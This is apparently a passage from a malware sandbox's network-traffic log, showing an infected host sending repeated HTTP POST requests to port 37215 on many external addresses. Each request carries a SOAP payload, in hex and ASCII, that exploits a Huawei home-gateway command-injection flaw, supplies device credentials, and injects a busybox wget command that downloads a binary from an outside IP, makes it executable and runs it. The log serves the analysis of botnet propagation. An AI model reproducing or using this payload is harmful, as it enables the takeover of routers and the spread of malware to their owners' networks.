                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            594192.168.2.155476441.100.128.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159699917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            595192.168.2.153505041.164.183.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159739971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            596192.168.2.153668041.250.63.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159740925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            597192.168.2.153373241.239.54.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159742117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            598192.168.2.154888441.98.228.24837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159811020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            599192.168.2.155297441.234.53.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159811974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            600192.168.2.153293241.31.95.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159818888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            601192.168.2.154981641.20.91.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159820080 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            602192.168.2.155893641.191.167.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159847975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            603192.168.2.154384841.71.17.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159854889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 